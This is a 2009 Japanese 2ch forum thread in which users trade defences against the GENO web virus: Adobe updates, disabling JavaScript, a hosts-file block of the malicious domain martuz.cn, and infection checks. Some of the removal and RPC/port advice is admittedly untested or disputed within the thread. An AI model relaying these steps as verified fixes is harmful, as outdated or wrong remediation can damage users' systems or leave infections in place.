GENOウイルススレ　感染4台目

1 名前：192.168.0.774 [2009/05/23(土) 12:42:46 ID:Hx9+/5Qd0] ★対処法(GENOウイルスチェッカーのサイトから引用) ■ adobe readerを9.1.1にアップデートする(9.1：9.1.0では駄目) 　 (9.1.0) 　 ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/jpn/AdbeRdr910_ja_JP.exe 　 (9.1.1↑,をインストールしてから↓を適用) 　 ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1.1/misc/AdbeRdrUpd911_all_incr.msp 　 バージョン情報はadobe readerを起動してヘルプ→adobe reader ?についてで表示されます ■ adobe javascriptをオフに 　 adobe readerを開いて　メニュー→編集→環境設定→javascript→adobe javascriptを使用のチェックを外す ■ adobe flashplayerを最新版に更新 　 fpdownload.macromedia.com/get/flashplayer/current/install_flash_player.exe ■ FirefoxにてNoscriptを利用 　 (Operaでflashオフでもおｋ([F12]を押す→[プラグインを有効にする]のチェックを外す) 　 (sleipnir、IEでも上手に設定するとなんとかなりますが、難しいです。) 　 swfのロード、pdfの関連づけ、activeXの無効化がきちんと出来れば問題ないが、IEコンポーネント利用ブラウザでは難しい 　 そのアタリが比較的楽に設定できるOperaはお勧め ■ hostsファイル書き換え 　 hostsファイルに以下の行を追加 　 127.0.0.1 martuz.cn 　 hostsファイルの在処 　 Windows XPの場合→「C:\WINDOWS\system32\drivers\etc」 　 Windows 2000の場合→「C:\WINNT\system32\drivers\etc」 　 Windows 95/98/MEの場合→「C:\Windows」 ■ Vistaの人ははUACをONにする ★GENOウイルスチェッカー、GENOウイルスまとめ geno.2ch.tc/ ★前スレ GENOウイルススレ　感染3台目 pc11.2ch.net/test/read.cgi/internet/1242721365/ 2 名前：192.168.0.774 [2009/05/23(土) 12:44:46 ID:Hx9+/5Qd0] ★症状 ・sqlsodbc.chmを改変 ・cmd.exe、regedit.exeが起動不能 ・一部のアンチウイルスソフトが更新不能 ・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト) ・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集 ・Googleの検索結果を改竄(リンクを弄る) ・explorer.exeや一部のブラウザが異常終了 ・Acrobatが勝手に起動 ・PDFファイルやシステムファイルが増殖 ・CPU、メモリ使用率がUP ・再起動時にBSOD ★Anubisレポート anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html ★感染確認方法 (現状(05/17)では感染が発覚したからといってどうにもできない、安心したい人用) �@regedit.exe（レジストリエディタ）が起動するか確認する 　※このウイルスに感染しているとレジストリエディタが立ち上がらない。 　■ 確認方法 　１．スタートから「ファイル名を指定して実行」 　２．「ファイルを指定して実行」という画面が出てくるので、入力欄に 　　　「regedit.exe」と入力して「OK」ボタンを押す。 　　　※立ち上がったことを確認したら弄らず閉じること。 �Aavast!（無料のアンチウイルスソフト）で確認 �Bsqlsodbc.chmのファイルサイズの確認を確認する 　■Windows XP: 　　改ざんされていなければ 　　C:\WINDOWS\system32\sqlsodbc.chm　50,727 bytes 　■Windows 2000: 　　そもそも存在しないはずなので、 　　C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。 ★感染した場合 (当方、この対処法について全く確認していません。自己責任でお願いします。) 1.C:\WINDOWS\Prefetch 内を全部削除 2.[Windowsキー] + [R] を押してファイル名を指定して実行で msconfig 3.スタートアップに何も書かれていない行があったのでチェックをOFF 4.再起動 5.C:\WINDOWS\System32\sqlsodbc.chm を削除　→　復活しないことを確認 6.正常なsqlsodbc.chmに差し替え 3 名前：192.168.0.774 [2009/05/23(土) 13:15:54 ID:Sr+xO+q90] イチモツ 4 名前：192.168.0.774 mailto:sage [2009/05/23(土) 13:20:22 ID:ta6edS2L0] まーたアフィの人がテンプレ変えたな GENOウイルスチェッカー(アフィリエイトも充実) ttp://geno.2ch.tc/←　アフィリエイト（Amazon）　↓ソース <iframe src="rcm-jp.amazon.co.jp/e/cm?t=geno2chtc-22&o=9&p=8&l=as1&asins=B001RN8TWK&fc1=000000&IS2=1<1=_blank&m=amazon&lc1= 0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe> <iframe src="rcm-jp.amazon.co.jp/e/cm?t=geno2chtc-22&o=9&p=8&l=as1&asins=B001F50L8U&fc1=000000&IS2=1<1=_blank&m=amazon&lc1= 0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe> <iframe src="rcm-jp.amazon.co.jp/e/cm?t=geno2chtc-22&o=9&p=8&l=as1&asins=B001F50LBC&fc1=000000&IS2=1<1=_blank&m=amazon&lc1= 0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe> <iframe src="rcm-jp.amazon.co.jp/e/cm?t=geno2chtc-22&o=9&p=8&l=as1&asins=B001F50L76&fc1=000000&IS2=1<1=_blank&m=amazon&lc1= 0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe> Jane使っている人は ツール-設定-コマンドで コマンド名　適当 実行するコマンドに ttp://geno.2ch.tc/index.php?url=$TEXT$LINK でjaneから検索でチェックできる 5 名前：192.168.0.774 mailto:sage [2009/05/23(土) 13:21:17 ID:ta6edS2L0] >>1 対応済 Flash Player 9.0.159.0 10.0.22.87 Adobe Reader 7.1.1 8.1.4 9.1.0 最新 Flash Player 10.0.22.87 Adobe Reader 9.1.1 6 名前：192.168.0.774 [2009/05/23(土) 13:30:55 ID:Hx9+/5Qd0] お、俺がチェッカーの管理人だって!? 俺はチェッカーに救われた一般人ですよ 7 名前：192.168.0.774 mailto:sage [2009/05/23(土) 13:32:50 ID:ta6edS2L0] いやいやだからって何でテンプレ変えちゃうわけ？ そのテンプレ間違えだらけだし、チェッカーも初心者の不安煽るだけじゃん チェッカー使った初心者が黒ですか白ですかって結局確認しにくるだろうが。 8 名前：192.168.0.774 mailto:sage [2009/05/23(土) 13:35:44 ID:mqjRjq9C0] 間違　え　だらけ… 9 名前：192.168.0.774 mailto:sage [2009/05/23(土) 13:36:28 ID:oHG73gbi0] >>7 馬鹿は黙ってろ 厨獄に帰れ 10 名前：192.168.0.774 mailto:sage [2009/05/23(土) 13:38:56 ID:F81SI+Tt0] 結局あのゴミチェッカーは混乱しか生まなかったしな 11 名前：192.168.0.774 mailto:sage [2009/05/23(土) 13:41:19 ID:ta6edS2L0] >>8 どっちも正解ですが何か？ >>9 いやだから何でいきなりアフィのテンプレに変えちゃうわけ？ 12 名前：192.168.0.774 [2009/05/23(土) 13:42:21 ID:Hx9+/5Qd0] >>7 またまた君はそんな重箱隅なことを言うだろ だいたい君、最新版で修正された脆弱性が他のサイトで攻撃されないっていう保証できるの?できないよね? 13 名前：192.168.0.774 mailto:sage [2009/05/23(土) 13:44:28 ID:ta6edS2L0] >>12 ここはGENOスレな ttp://www.adobe.com/jp/support/security/bulletins/apsb09-04.html 感染報告やら参照するのにどこでこの脆弱性が修正されたかは明確なほうがいいだろ 14 名前：192.168.0.774 [2009/05/23(土) 13:47:52 ID:Sr+xO+q90] >>13 GENOウイルススレであろうがなんであろうが、初心者に優しい方がいいに決まってるだろうが どこで脆弱性が修正されたかなんて一部の知識ある人が勝手に調べればいいだけだっつーの だいたいそういう知識あるヤツは感染もしないし、アップデートもちゃんとしてる 15 名前：192.168.0.774 mailto:sage [2009/05/23(土) 13:51:13 ID:F81SI+Tt0] >>14 初心者に優しいスレを目指すなら間違えぐらい直すべき 16 名前：192.168.0.774 mailto:sage [2009/05/23(土) 13:53:42 ID:soK/x83h0] 　　　／⌒ヽ 　　/　´_ゝ`）　　お久しぶりですね、すいません、ちょっと ry 　　|　 　　/ 　　| /|　|　 　 //　| |　 　Ｕ　 .Ｕ 17 名前：192.168.0.774 [2009/05/23(土) 13:53:57 ID:Hx9+/5Qd0] なんだよ ID:F81SI+Tt0＝ID:ta6edS2L0 かよｗｗ 必死ﾀﾞﾅｰｗｗｗ 18 名前：192.168.0.774 mailto:sage [2009/05/23(土) 13:54:17 ID:ta6edS2L0] 初心者にやさしい対策テンプレが ・hosts追記 ・js無効（火狐NoScript推奨） ねーよ。それならreader更新だけでいいじゃん。 19 名前：192.168.0.774 mailto:sage [2009/05/23(土) 13:54:21 ID:3BjN7uEa0] 間違えの無いようにやっていきたいもんです 20 名前：192.168.0.774 mailto:sage [2009/05/23(土) 13:56:00 ID:F81SI+Tt0] 前スレのテンプレ書き直すか 21 名前：192.168.0.774 mailto:sage [2009/05/23(土) 13:56:01 ID:ta6edS2L0] >>17 ID:Hx9+/5Qd0 ID:Sr+xO+q90 こうですか？わかりません＞＜ 反論出来ないからって、煽りはいいですから。 22 名前：192.168.0.774 mailto:sage [2009/05/23(土) 13:59:41 ID:YL7Xpp0S0] なになに、昨日だかadobe reader6.0→9.1.0にして 安心してたけど9.1.1じゃないとダメなのかｗ (9.1.0をインストールしてから↓を適用) 　 ttp://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1.1/misc/AdbeRdrUpd911_all_incr.msp これはreader起動して「アップデートの有無をチェック」ではダメなのん？ 23 名前：192.168.0.774 mailto:sage [2009/05/23(土) 14:00:21 ID:ZVz/t1CW0] 新スレいきなり荒れててﾜﾛﾀｗ firefoxのNoScript、試したことない人は一度はやってみるのもいい鴨 ただ、だんだん我慢できなくなって外してしまう、遅かれ早かれｗ 前スレ>>854にチラっと出てたeval関数だけ止めるとかいうやつは 国産オミトロンみたいなもんという理解でいいと思われ にしても初心者対応は難しいよね。要するに「明日も明後日も絶対安心な方法を教えて！」 って言ってるようなものだからなぁ。そんな方法があれば誰も苦労しませんよ、ないから こうやって必死に毎日、最新の情報漁ってるというのに・・・ 24 名前：192.168.0.774 mailto:sage [2009/05/23(土) 14:00:50 ID:BPqsEeLX0] sqlsodbc.chmのサイズが1.29 KB (1,323 バイト)だったんだけど… 感染してたのかな。取りあえず削除して入れなおしました。 GENOウイルスチェッカーって信憑性あるの？ どこで感染したか調べたくて、その頃行ったサイト　ttp://boox.jp/　 をチェックしたら危険度106%って出たんだけど。 25 名前：192.168.0.774 mailto:sage [2009/05/23(土) 14:01:34 ID:OPuerAms0] >>21 反論しないってことな自演してたんですね? そんなモラルのない人は出て行ってください 26 名前：192.168.0.774 mailto:sage [2009/05/23(土) 14:02:54 ID:ta6edS2L0] >>22 readerの脆弱性を突いたこのウイルス挙動は9.1.0で対策済 9.1.1へのアップデートは >これはreader起動して「アップデートの有無をチェック」ではダメなのん？ それでいい 27 名前：192.168.0.774 mailto:sage [2009/05/23(土) 14:04:14 ID:ta6edS2L0] >>25 意味がわかりません。 28 名前：192.168.0.774 mailto:sage [2009/05/23(土) 14:05:29 ID:MMIDDv3r0] >>27 厨獄に帰れウジ虫 29 名前：192.168.0.774 [2009/05/23(土) 14:05:36 ID:Sr+xO+q90] >>21 お前はなにを言っているんだ(AAry >>18 hosts追記は現時点では無効だけど noscriptに関しては、新たな脆弱性に対して有効だよね? >>24 chmがどうたらこうたらはワカランけど そこは大丈夫だよ 30 名前：192.168.0.774 mailto:sage [2009/05/23(土) 14:06:46 ID:C376xCRT0] >>24 そこは違うっぽい そこ以外で感染したサイトを踏んでる クロなのでOSいれなおしてください 31 名前：192.168.0.774 mailto:sage [2009/05/23(土) 14:07:21 ID:ZVz/t1CW0] >>1 > ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/jpn/AdbeRdr910_ja_JP.exe > (9.1.1↑,をインストールしてから↓を適用) 今は最初から9.1.1でインストールされる筈　まぁ画面見てればわかるが 32 名前：192.168.0.774 [2009/05/23(土) 14:08:57 ID:Hx9+/5Qd0] >>27 自演してないなら 意味が分かりませんって返答はないよねｗｗ >>31 ｍｊｄ? 管理人さんにメールしとくわ サンクス 33 名前：192.168.0.774 mailto:sage [2009/05/23(土) 14:09:45 ID:BPqsEeLX0] >>29-30 ありがとう。ここじゃないのか。 CD-ROMがないからOS入れなおせないんだ・・・。 34 名前：192.168.0.774 mailto:sage [2009/05/23(土) 14:10:18 ID:DahySqY8O] このスレもとうとう消費期限が切れたか… 35 名前：192.168.0.774 mailto:sage [2009/05/23(土) 14:10:37 ID:jkLej88t0] ID:oHG73gbi0 ID:OPuerAms0 ID:MMIDDv3r0 単発 36 名前：192.168.0.774 mailto:sage [2009/05/23(土) 14:12:01 ID:OPuerAms0] >>33 >>2の★感染した場合やってみたら？ 37 名前：192.168.0.774 mailto:sage [2009/05/23(土) 14:12:10 ID:jkLej88t0] ID:Hx9+/5Qd0 38 名前：192.168.0.774 mailto:sage [2009/05/23(土) 14:13:47 ID:YL7Xpp0S0] >>26,31 ありがとう。今アップデートで9.1.1になった。 何か分からないけど昨日9.1をインストールした時点では verは9.1.0だったんだけど、これでも対策済だったのか。。 39 名前：192.168.0.774 mailto:sage [2009/05/23(土) 14:19:03 ID:BPqsEeLX0] >>36 ★感染した場合やってみた。あとAdobeも最新版にした。 これだけやってれば大丈夫かな？ 40 名前：192.168.0.774 mailto:sage [2009/05/23(土) 14:19:17 ID:jkLej88t0] ttp://www3.atword.jp/gnome/2009/05/19/finally-several-security-venders-detect-gumblaroid-completely/ 全撃墜してるのは AhnLab-V3 AntiVir AVG Kaspersky McAfee-GW-Edition Microsoft NOD Rising Symantec avast!でもいいの？ 41 名前：192.168.0.774 mailto:sage [2009/05/23(土) 14:22:32 ID:0Xu3vLQ/0] >>40 今日の日付確認しろｗ 42 名前：192.168.0.774 mailto:sage [2009/05/23(土) 14:35:44 ID:F81SI+Tt0] うわーテンプレ書き直そうと思ったけど前のテンプレも結構微妙だー sqlsodbc.chmのサイズに頼るんじゃなくてレジストリの内容見た方が確実 だと思うんだけどやっぱ初心者向けじゃないか 43 名前：192.168.0.774 mailto:sage [2009/05/23(土) 14:36:34 ID:C376xCRT0] >>39 こっちも見てみて 駆除方法についてSymantecの説明 www.symantec.com/ja/jp/norton/security_response/writeup.jsp?docid=2009-051900-3410-99&tabid=3 ただ、今後のためにもリカバリディスクはあったほうがいいよ メーカー製PCならHDD内にあるんじゃないのかな 取説みてくれ 44 名前：192.168.0.774 [2009/05/23(土) 15:00:55 ID:BukbC16CP] 対応してるアンチウィルスソフト一覧を貼って下さい 45 名前：192.168.0.774 [2009/05/23(土) 15:03:38 ID:XxYYorp40] sexsyasin.exblog.jp/ 46 名前：192.168.0.774 mailto:sage [2009/05/23(土) 15:04:20 ID:BPqsEeLX0] >>43 ありがとう。システムの復元機能を無効にしておきました。 取説がOffice XPのしか見当たらないのですが、なんとかリカバリディスクを探してみます。 47 名前：192.168.0.774 mailto:sage [2009/05/23(土) 15:15:04 ID:MMIDDv3r0] (・∀・)ﾆﾔﾆﾔ 48 名前：192.168.0.774 mailto:sage [2009/05/23(土) 15:15:46 ID:imZ1efiC0] >>44 １種類じゃなく、何種類も日替わりで出まわっているので、そんな一覧作成できない。 検出可否報告スレを見る限りでは、かなりのベンダーが対応を始めているようだが 完璧に対応していて除去までおっけーなところを聞かれてもわからない。 本体検出の能力と、除去能力は別のものだから。 49 名前：192.168.0.774 mailto:sage [2009/05/23(土) 15:22:23 ID:F81SI+Tt0] 出回ってたの4日も前の話ですよ 50 名前：192.168.0.774 mailto:sage [2009/05/23(土) 15:22:55 ID:1RJPI6/M0] 前スレの984で ------------- 984 名前：192.168.0.774[sage] 投稿日：2009/05/23(土) 09:31:48 ID:Ci5k0h8A0 (PC) あと、6時間前に立った　セキュリティー板のテンプレに ■ポート135を閉じる ■ポート445を閉じる ってあるんだが、止めさせて方がいいと思うんだが、どうだろう？ ------------------- と書いたんだけど、コメントくれた人。 なかなかレスできなくてごめん。ありがとう。 さっきまで感染疑いの奴と電話で話してたんだが、 確認ステップの途中で「まだあるの〜はぁー」なんてため息つかれちまった。　なんだこの怒り。 ///////// ポート135と445を止める為にサービスを停止するTipsはあっちのスレのテンプレから外した方が良さそうって のがこっちのスレの意見ってことでOKかな？ だが、検索すると脆弱性情報とか危険なポートなので塞いだ方がいいっていうスタンスのサイトばかりで、 サービスの停止にする事によってポートを塞ぐことによる弊害を説明するのが大変そうだな。 「さっきのスレの最後の方を読んでくれ」だと、こっちに人が増えてマズイか？ >>43 これでも危険度低に分類されるんだね。　　じゃあ高ってどんなのだよと思ったが、 ゼロデイじゃないし感染する為の必要条件も複数あるし、攻撃サイトは消えたしなぁ。 51 名前：192.168.0.774 mailto:sage [2009/05/23(土) 15:31:08 ID:0Xu3vLQ/0] >>50 ちうかRPC停止云々をテンプレから外したほうが〜って話はテンプレに組み込まれた時から言われてたのよｗ でもその時は流れ速くてスレ立て人が気付いて無かったり、荒らしがスレ立ててわざと旧テンプレ書いたり んな流れで残ってるだけ Port135も445も塞いだほうが良いのは確かだが、GENOにゃ関係無いしテンプレに含まなくても良い（現状ならね） そしてRPC停止は影響度が高い（依存関係が大量で初心者ほどやっちゃいかん行為）ので正直書いた奴出て来いって感じｗ 52 名前：192.168.0.774 mailto:sage [2009/05/23(土) 15:35:41 ID:h8voSB2Y0] rpcssは止めるに止められない【サービス】。 135,445は、外からは入らないようにする【ポート】。 GENO系ウイルスは関連してないが、こっから入られるウイルスは多いので、 巻き添えで話題になってる。関係ないけど、これを機会になんとかしとけ。 53 名前：192.168.0.774 [2009/05/23(土) 15:37:58 ID:BZCm21Hn0] 前スレの結論としてはアドビリーダーを7〜9で更新していれば良かったんじゃないかな 他にアンチウイルスソフトを変えたり、ブラウザのジャバを切ったりするのは確か意味無かったと思う 54 名前：192.168.0.774 [2009/05/23(土) 15:43:42 ID:BZCm21Hn0] ↑アドビリーダーの脆弱性を突いたウイルスだから それが機能しなかったら他の事をやってみ意味が無いという意味ね 55 名前：192.168.0.774 mailto:sage [2009/05/23(土) 16:02:04 ID:h8voSB2Y0] Javaを切る: 特に数年前は、他のウイルスをよけるのに意味があったが、今回ウイルスには無効。 JavaScriptを切る: 効果があるが、見られないサイトがかなり出てくる悪感で、対初心者には非現実案。 56 名前：192.168.0.774 [2009/05/23(土) 16:16:30 ID:BZCm21Hn0] まあいいや、おまいらはご丁寧にウィンドウズの更新も出来なくするような間抜けだから 過剰防壁でも備えたまへ 57 名前：192.168.0.774 mailto:sage [2009/05/23(土) 16:18:45 ID:1RJPI6/M0] >>52-53 ジャバじゃなくてJavaScriptね。 心配してくれてありがとう。 だが、自分のは、しっかりやってるから大丈夫。 じゃあ、あっちのスレに書いてくるわ。 58 名前：192.168.0.774 mailto:sage [2009/05/23(土) 16:29:33 ID:4+szvDMsP] >>56 分かっててやってるんだろ、それを言ったら2k/XP以外はそもそも関係ないし 個人的には JavaScript の切り方とかいろいろ試すってのはいい事だと思うぞ 59 名前：192.168.0.774 mailto:sage [2009/05/23(土) 16:29:35 ID:FQnBqUEn0] チラ裏メモ ■ Adobe Flash Player Adobe Flash Player のバージョンテスト ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm ブラウザ上でアクティブになっている Flash Player と、 最新のバージョンを確認できる。 この書き込み時の最新バージョン : 10,0,22,87 ■ Adobe Reader Adobe Reader のバージョン確認方法 Adobe Reader の[ヘルプ]メニュー→[Adobe Reader X について] この書き込み時の最新バージョン : 9,1,1 60 名前：192.168.0.774 mailto:sage [2009/05/23(土) 17:27:28 ID:M+Ygu9WD0] Adobe Readerなんて入れなきゃいいだけでしょ 61 名前：192.168.0.774 mailto:sage [2009/05/23(土) 17:29:00 ID:jkLej88t0] セキュ板19もアフィのチェッカーのテンプレに書き換えられてるのね 62 名前：192.168.0.774 mailto:sage [2009/05/23(土) 17:40:34 ID:O9Ovf6/e0] >>60 けだし正解である。 63 名前：192.168.0.774 mailto:sage [2009/05/23(土) 17:44:20 ID:a8bSNZSK0] >>60 フラッシュもね。 64 名前：192.168.0.774 mailto:sage [2009/05/23(土) 17:46:07 ID:FMuei+100] >>50 それらのポートは外部に対して閉じておけばいい話で、LAN内で 閉じる必要はない。 ブロードバンド回線を使っているのならルータがあるだろうから、 ルータで閉じておけばいいし、モバイルの場合はFWアプリで ブロックすればいい。 いずれにしろ、サービスレベルで止めてしまうのは無茶だし、 そもそもGENOに直接関係しているものでもない。 セキュリティ一般の基本みたいなもんだから、テンプレには 必要ないでしょ。 65 名前：192.168.0.774 mailto:sage [2009/05/23(土) 17:59:00 ID:1RJPI6/M0] >>64 もう書いちまったあとだけど、後押しthx。 >>59 そこ、下の黒文字（現在の Flash Player バージョン）よりも、 テスト結果の赤文字の方が新しいってことあるよ。 つまり、現在の最新バージョンの更新タイミングがめちゃくちゃ遅い（1ヶ月放っておかれるなんてざら）。 はじめは偽サイトかと思って焦ったほどだ。 JRE とかのJavaもだけど、英語サイトで確認するか、その補足程度に使うのがお奨め。 Security bulletins and advisories www.adobe.com/support/security/#flashplayer 66 名前：192.168.0.774 mailto:sage [2009/05/23(土) 18:30:14 ID:imZ1efiC0] >>61 うむ、アフィチェッカーは、テンプレから外すべきだろう。混乱を招いている上に、テンプレ改変とか、いらんことしかしない。 67 名前：192.168.0.774 mailto:sage [2009/05/23(土) 18:33:24 ID:Sz6n7xWm0] やべえサブ機感染したかも 文字勝手に打ちまくって制御不能 68 名前：192.168.0.774 mailto:sage [2009/05/23(土) 18:41:44 ID:5P+JCV3b0] >>67 横で猫がキーボードを踏んでないか見るんだ 69 名前：192.168.0.774 mailto:sage [2009/05/23(土) 18:47:10 ID:Sz6n7xWm0] >>68 ヘッドフォンがキー押してただけだったわ、すまん。 70 名前：192.168.0.774 mailto:sage [2009/05/23(土) 18:48:10 ID:IKhyILDB0] >>67-69 笑ったｗｗｗ 71 名前：192.168.0.774 mailto:sage [2009/05/23(土) 19:07:35 ID:3BjN7uEa0] おいｗｗ 72 名前：192.168.0.774 mailto:sage [2009/05/23(土) 19:13:06 ID:sQU+1gs30] 和んだw 73 名前：192.168.0.774 mailto:sage [2009/05/23(土) 19:39:42 ID:c4WG3X5q0] >>67-69 不覚にも 74 名前：192.168.0.774 mailto:sage [2009/05/23(土) 19:41:34 ID:OA8HLuhR0] >>69 俺も似たような経験あるｗ あせるよなｗ 75 名前：192.168.0.774 mailto:sage [2009/05/23(土) 19:54:11 ID:a/bRTiGj0] >>67-69 なぜ13分もかかったｗ 76 名前：192.168.0.774 mailto:sage [2009/05/23(土) 19:56:05 ID:imZ1efiC0] >>67-69 和ませるなｗ 77 名前：192.168.0.774 mailto:sage [2009/05/23(土) 20:18:28 ID:kR9G4T450] 今は小休止状態みたいなので質問させていただきたいのですが、先週木曜日に初めて GENOウイルスのことを知ったときに、Adobe関係は全部アンインストールいたしました。 と思っていたのですが後で、もう一度、プログラム一覧を見直したところ、 Korean Fonts Support For Adobe Reader8.1.0というのが残っていました。 どうやら一連のAdobe製品と離れた位置に在ったので見落としていたようです。 そのときは速攻アンインストールしたのですが、後で気になってググってみても、 検索結果は 外国語のページのものが多く、直接Adobeのサイトにも行きましたが、 もう一つ、はっきりとした記述がありません。 私がフォントファイルの意味を もう一つ はっきりと理解していないせいもありますが、 まあアジア拡張言語フォントパックの中の一つらしい というぐらいは分かりました。 そこで、もう一度ダウンロードして、起動させるなりプロパティを見るなりして 正体を確かめようとしたのですが、今度は、（以下、テキトー訳） このインストールには あなたのシステム上にインストールされたAdobe Reader8.1.0が必要です。 このインストーラーを起動する前に、Adobe Reader8.1.0をインストールしてください みたいな表示が出て、インストールできません。 これは、いわゆる言語パッチといわれる類のものなのでしょうか？　もし、 そうなら放っておいても、単独で起動することはないでしょうから安心ですが……。 そういえば、ファイルサイズも、3.9メガバイトと小さかったように思います。 長文になってしまい、スミマセン。さんざん既出の質問なら、 チラシの裏、乙 で捨て置かれて結構です。 78 名前：192.168.0.774 mailto:sage [2009/05/23(土) 20:35:03 ID:C376xCRT0] >>77 なんでそこまで長文になったのかわからんけど Korean Fonts Support For Adobe Reader8.1.0 これはフォントの追加パッケージみたいなもんだとおもう アンインストールしたならそれで問題ないです インストールする必要はありません あとプログラムの追加と削除には出ないIE用FlashPlayerは残ってると思います www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm ここでバージョンを確認して最新版をいれてください 79 名前：192.168.0.774 mailto:sage [2009/05/23(土) 20:41:58 ID:GyZU8Yee0] 延々とブルスクが繰り返されるようになって起動しなくなってしまった・・・ もうこの状態になったらどうすればいいのかさっぱりだ クリーンインストールは無理なのかな？ 80 名前：192.168.0.774 mailto:sage [2009/05/23(土) 20:47:19 ID:F81SI+Tt0] セーフモードでも起動しないならクリーンインストール 81 名前：192.168.0.774 mailto:sage [2009/05/23(土) 22:00:43 ID:hutaJPqN0] >>79 救出したいデータがあるなら Puppy等でデータ待避 82 名前：192.168.0.774 mailto:sage [2009/05/23(土) 22:30:15 ID:C376xCRT0] >>79 クリーンインストールはできるよ 83 名前：192.168.0.774 [2009/05/23(土) 23:21:47 ID:BukbC16CP] 感染したらバックアップソフトで復元すれば大丈夫かな？ 84 名前：192.168.0.774 mailto:sage [2009/05/24(日) 00:47:38 ID:Ai80SDN30] GhostやTrue Imageのような丸々復元するソフトなら大丈夫。 85 名前：192.168.0.774 mailto:sage [2009/05/24(日) 01:02:36 ID:r2Cbq1zZ0] >>78 うち（XPSP3 FlashPlayer 10）では、プログラムの追加と削除に adobe Flash Player 10 AcriveX として出るけどな。 まぁ、サイトで確認するのはいいことだと思うけど。 >>83 True ImageのスレッドでSystem Volume Infomation やバックアップの暗号化について訊いている人がいたな。 まぁ、外付けＨＤＤとかに退避した方がより、安全だとは思うけど。 >>81 Puppyって知らなかった。 86 名前：192.168.0.774 mailto:sage [2009/05/24(日) 01:07:19 ID:heAsx668P] 俺も外付けにTrue Imageでバックアップしてるよ 87 名前：192.168.0.774 mailto:sage [2009/05/24(日) 01:47:33 ID:aJuP8TRJ0] >>78さん、残っていました。アドオンの中に、flash shockwaveが。 いろいろ確認したので、返事が遅くなって、すみません。 アンインストールするときに、確か Firefox用アドオンとIF用プラグインを削除します とか出たので、自分では残っていないつもりでした。 これは、昔から、スレにいる人には、割と周知の事実なんでしょうか？ もしかしたら最近のスレでも話題に登っていたのかもしれませんが、割と聞き逃していました。 お恥ずかしい限りです。IE7の場合（8と6は未使用のため）「ツール」→「アドオンの管理」→「アドオンの有効と無効」→デフォルトの「現在 Internet Explper で読み込まれて いるアドオン」で探したときには見つからなくて、他の方法で確認しようとしましたが、 後で入っているのに気がついてからアドオンの有効と無効を見たら、「許可なしで実行される アドオン」とか他の項目のところには、ちゃんと表示されていました。 まとめも、ざっとですが見にいってきましたが、ちょっと どこに書いてあるか確認できませんでした。 >>なんでそこまで長文になったのかわからんけど すみません。きっと説明厨で、長文虫なんでしょうね。 聞きたかったのは、簡単に言うと、Kor 88 名前：192.168.0.774 mailto:sage [2009/05/24(日) 01:52:26 ID:aJuP8TRJ0] >>なんでそこまで長文になったのかわからんけど すみません。きっと、説明厨で、長文虫なんでしょうね。 聞きたかったのは、簡単に言うと、Koreanなんちゃらを 自分と同じように アンインストール派の人で 消し忘れてる人いるだろうけど、これって無害なの？ ってことです。でも、Flash・Shockwaveのほうが、よっぽど恐ろしかったです。 これは、やっぱりアップデート派の人の ほうが正解かな？？ なんで途中で消えたんだろう。あっ、書き込み完了する前に、 タブ移動したからかな。 89 名前：192.168.0.774 mailto:sage [2009/05/24(日) 02:07:23 ID:2VJlz39B0] >>88 なんか、勘違いしているようだけど、ShockwaveはFlashplayerとは違うよ。 Shockwaveは2006年の2月のが最新 www.adobe.com/support/security/#shockwave Adobe Shockwave と Flash Playerのテスト www.adobe.com/jp/shockwave/welcome/ ここで両方をテストできる。 Shockwaveなんてなくて困らないから、アンインストールしたままがいいだろうけどね。 90 名前：192.168.0.774 mailto:sage [2009/05/24(日) 02:11:49 ID:dPjaiBoy0] 2ch的には収束に向かってるの？ 91 名前：192.168.0.774 mailto:sage [2009/05/24(日) 02:17:06 ID:2b1ExXhKP] Flash Playerが9.0.124.0以上でAdobe Readerが9.1以上なら感染しない 収束しないほうがおかしいだろ 92 名前：192.168.0.774 mailto:sage [2009/05/24(日) 02:17:24 ID:oOp80I+s0] 新ネタ待ち。GENO系の次が出てくるか、別のウイルスが話題になるかはわからない 不安な人は引き続き不安、困ってる人は引き続き困ってるので、解決したってわけじゃない 93 名前：192.168.0.774 mailto:sage [2009/05/24(日) 02:22:29 ID:HFhRBZx00] USCERTやセキュリティ企業が動き始めた段階でサーバ停止 もう十分な量のボットは確保しただろうし後は儲けるだけなんじゃねえの 94 名前：192.168.0.774 mailto:sage [2009/05/24(日) 02:23:15 ID:Q8xZKwGm0] 感染しても顕著な症状がでないので気付いてない人も多いし。 95 名前：192.168.0.774 mailto:sage [2009/05/24(日) 02:32:01 ID:jcHTZiwS0] >>4 このウィルスチェッカー置いてるトコが感染する事ないの？ 96 名前：192.168.0.774 mailto:sage [2009/05/24(日) 02:40:08 ID:332mANDn0] Puppyってあるんだな。 試してみようかなー。 97 名前：192.168.0.774 mailto:sage [2009/05/24(日) 06:37:27 ID:uAVXuYQE0] 今頃になって感染するって、どこから拾ってきてんだよ 亜種がどうなるかは知らんけど、 使われてたのは3月に塞がれた穴だったらしいな なんかもう、感染した奴乙としか言いようがない。 98 名前：192.168.0.774 mailto:sage [2009/05/24(日) 07:49:59 ID:aJuP8TRJ0] >>89、すみません。呼び名も意味も、全部、間違ってました。 Shockwave Flashは、Flash Playaerの子供みたいなものかと思っていたのですが、 Shockwave Flash は、ActiveXコントロール系だったのですね。まだ、よく分かってませんが。 なんスレか前でスレの皆さんが話してたはずなのに、失念してました。 大手動画サイトが古いバージョンのFlash Playerを勝手に呼び出すと、 どなたかが話してたの思い出して、確かめに回った後だったのに。 